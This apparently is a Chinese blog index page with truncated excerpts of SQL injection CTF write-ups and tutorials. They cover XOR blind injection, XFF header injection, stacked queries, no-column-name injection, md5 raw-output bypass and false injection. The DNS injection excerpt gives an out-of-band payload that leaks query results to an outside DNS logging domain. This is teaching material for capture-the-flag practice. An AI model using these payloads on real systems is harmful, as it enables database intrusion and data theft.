sql注入

[GYCTF2020]Ezsqli

知识点:information_schema.tables变形。无列名比较注入 fuzz一下 发现可用^异或,可以进行盲注 因为information_schema被过滤了,我们要获得表名可以用 sys.schema_table_statistics_w...

[RoarCTF 2019]Online Proxy

知识点:sql盲注 XFF注入 知识点很简单,就是从xff头进行sql注入.只是这个模型没见过:xff输入一个sql注入payload后提交后,然后再发包换一个xff头过去,会显示last ip:... ,然后再发一个xff一样的包,若sql注...

[SUCTF 2019]EasySQL1

知识点:sql_mode,堆叠注入 [SUCTF 2019]EasySQL1 知识点:sql_mode,堆叠注入 sql_mode: 一个参数,用于控制sql语句的某些行为. 如set sql_mode=PIPES_AS_CONCAT的意思就是将"||"视为字符串...

无列名注入

可用于information_schema被禁用时(具体来讲是知道了库,表名却不知道列名 无列名注入 可用于information_schema被禁用时(具体来讲是知道了库,表名却不知道列名 先来讲讲原理: 我们直接select1,...

绕过 md5(str,true).来进行注入

实际操作时,你想要登入后台时,当你发现sql语句结构是这种select * from 'table' where psw=md5($_['psw'],true) ,会非常蛋疼。 那么怎么绕过呢 绕过 md5(str,true). 来进行注入 实际操作时,你...

SQL注入:DNS注入

dns注入 payload: select load_file(concat(“\\\\",payload,".域名\\a"); 具体步骤: 在http://www.dnslog.cn该网站上取得一个域名,在file_priv是空的情况下,使用上面的payload,loa...

SQL注入:False注入

原理:sql中字符串和数字进行比较时,字符串会被转换成浮点数,若字符串前几位不是数字则会被转换成0,若前几位有数字则会被转换成那几个数字。 false注入 原理: sql中字符串和数字进行比较时,字...

SQL注入基础

SQL注入: 1.常用函数及操作符: version()// mysql版本 user()// 数据库用户名 database()//数据库名 @@datadir //数据库路径 @@version_compile_os //操作系统和版本 concat(s...